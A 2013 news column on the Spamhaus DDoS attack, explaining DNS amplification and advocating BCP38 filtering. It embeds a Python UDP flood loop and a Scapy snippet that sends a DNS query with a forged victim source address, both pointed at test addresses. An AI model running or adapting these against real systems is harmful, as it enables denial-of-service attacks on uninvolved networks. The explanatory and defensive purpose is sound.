
Why Spamhaus Internet attack was good

By Prasanto K. Roy, IANS

It’s been a few days since the worst denial-of-service attack in the Internet’s three-decade history. A 300-gigabit-per-second torrent of traffic flooded the networks of Spamhaus and major Internet exchanges in London, Amsterdam and Frankfurt. It was like a million cars trying to get onto Mumbai’s Sea Link at the same time. Some called it the attack that “almost broke the Internet”.

Can the Internet really be brought down by a single group of individuals? Is it that fragile? The short answer is: yes and no.

Let’s start with the No. The Internet evolved from a network designed to be robust enough to survive multiple nuclear strikes. The Internet adapts to attacks and outages, reroutes traffic, and survives just about anything you throw at it. Fact.

Yet much has changed from that early vision of a robust, adaptive network. In the early Internet, most traffic was text, and it wasn’t sensitive to “latency” – small delays. It didn’t matter if that text was delayed a few moments or even minutes.

Now, a huge chunk of traffic on the Internet is video and audio. A lot of the audio, and some of the video, is in real time. If you’re on a phone call with someone in another country, the call is probably being routed over the Internet, and you need very low latency – delays of more than a fraction of a second make conversation painful.

And then there’s a range of critical services on the Internet. Take financial transactions, including stock trades. Automated systems respond in microseconds to bids or market changes. Many traders pay to place their servers physically close to stock exchanges, because they value the microsecond edge that proximity gives them. Delay a company’s financial transactions by a few seconds, or minutes, and you’re talking about a hit of millions of dollars on your target.

So, while it is very, very difficult to “break the Internet”, for many of the services running on it today, even slowing it down can be crippling. (Difficult, but not impossible. There are a few physical weak links, mainly around the undersea cables. The recent arrest of divers caught trying to cut a critical cable near Egypt suggests a well-funded operation.)

So how did the perpetrators slow down the Internet so severely?

They used a DDoS or “distributed denial of service” attack: they flooded their target organization’s servers with so much traffic that those servers slowed to a crawl. In this case, the attackers sent small queries to thousands of “open” DNS servers around the world, with the sender’s address forged to look like Spamhaus’s, so that each server fired its much larger reply at Spamhaus – amplifying the flood many times over.

That’s like flooding an organization with so many junk-mail letters that it can’t sort out the real mail. In the process, the “collateral damage” includes the post offices along the way, which slow down badly – affecting every organization those post offices serve.
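For the technically curious, here is a minimal sketch of that brute-force pattern in Python. Everything in it is illustrative: it fires junk packets at a hypothetical test port on your own machine – the same pattern a real DDoS uses, except launched from thousands of machines at once against someone else’s servers:

```python
# Illustrative only: a tiny "flood" aimed at a test port on this machine.
# A real DDoS does exactly this, from thousands of machines simultaneously.
import socket

TARGET = ("127.0.0.1", 9999)   # hypothetical local test port, not a real target
PAYLOAD = b"x" * 512           # junk bytes standing in for bogus requests

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # UDP socket
for _ in range(100_000):
    try:
        sock.sendto(PAYLOAD, TARGET)  # each packet costs the sender almost nothing...
    except ConnectionRefusedError:
        pass                          # no listener on the test port; keep going
# ...but the receiver must examine every packet, and that is what starves
# it of the capacity to answer legitimate traffic.
```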

How do you prevent such an attack?

Through a two-pronged approach. One is to trace the sources and shut them down. To make this difficult, attackers use third-party servers as staging platforms, and further “spoof” Internet addresses to make the traffic hard to trace and block in real time. Cybercrime units do have the means to trace such traffic, but the job is complicated by the lack of real-time collaboration between the cyber-forces of different countries.
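What “spoofing” means at the packet level is worth seeing: the source address is just a field in the packet’s header, and nothing in the basic Internet protocol checks that the sender actually owns it. Here is a hedged sketch using the Scapy packet library – the addresses come from documentation-reserved test ranges, and sending raw packets like this needs administrator rights on an isolated lab network:

```python
# Illustrative only: forging the source address of a single packet.
# Scapy lets you set any field in the IP header, including "src" -
# the basic protocol never verifies that the sender owns that address.
from scapy.all import IP, UDP, DNS, DNSQR, send

spoofed = IP(
    src="203.0.113.7",    # forged source: the victim's address (reserved test range)
    dst="198.51.100.53",  # an "open" DNS resolver (reserved test range)
) / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname="example.com"))

# The resolver's much larger reply goes to the forged source - that is,
# to the victim - which is how small queries become a very big flood.
send(spoofed)  # requires root/administrator privileges
```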

The second prong is the better way out: redesign parts of the Internet to be more robust, so that it can ignore or adapt to such attacks.

After a major DDoS attack in 2000 crippled servers run by Amazon, Yahoo and others, the Internet Society, which includes engineers who invented the Internet, published a “best current practice” (BCP) document called BCP38 (RFC 2827), which described ways to beat many types of DDoS attacks – chiefly by having every network refuse to pass on packets with forged source addresses.
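The heart of that recommendation can be sketched in a few lines of Python. This is an illustration, not real router code – the address blocks and the function are hypothetical:

```python
# Illustrative sketch of BCP38-style ingress filtering, not real router code.
# A provider knows which address blocks it assigned to a customer link;
# a packet from that link claiming any other source address is forged.
from ipaddress import ip_address, ip_network

# Hypothetical address blocks assigned to one customer link (test range).
CUSTOMER_PREFIXES = [ip_network("198.51.100.0/24")]

def permit(source_ip: str) -> bool:
    """Forward a packet only if its source address is one we assigned."""
    addr = ip_address(source_ip)
    return any(addr in prefix for prefix in CUSTOMER_PREFIXES)

print(permit("198.51.100.7"))  # True  - legitimate source, forward it
print(permit("203.0.113.7"))   # False - spoofed source, drop it
```

In practice this check lives in router configuration rather than application code, but the rule being enforced is exactly this one: if every network dropped forged packets at its own edge, spoofed floods like the one aimed at Spamhaus could not get off the ground.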

Unfortunately, these best practices were not widely implemented by service providers, because they required each provider to invest individually for the greater common good – the security of the Internet. Sort of like people not spending money on green homes to save the environment, unless a law demands it.

The Spamhaus attack may become a milestone: the point after which major service providers are encouraged (or mandated by governments and Internet oversight bodies) to implement the BCP38 recommendations, and to strengthen their networks overall by adding redundant paths and reducing single points of failure. Spamhaus 2013 may, therefore, have been a good thing for the future of the Internet.

(31-03-2013. Prasanto K. Roy (@prasanto on Twitter) is editorial advisor at CyberMedia. The views expressed are personal.)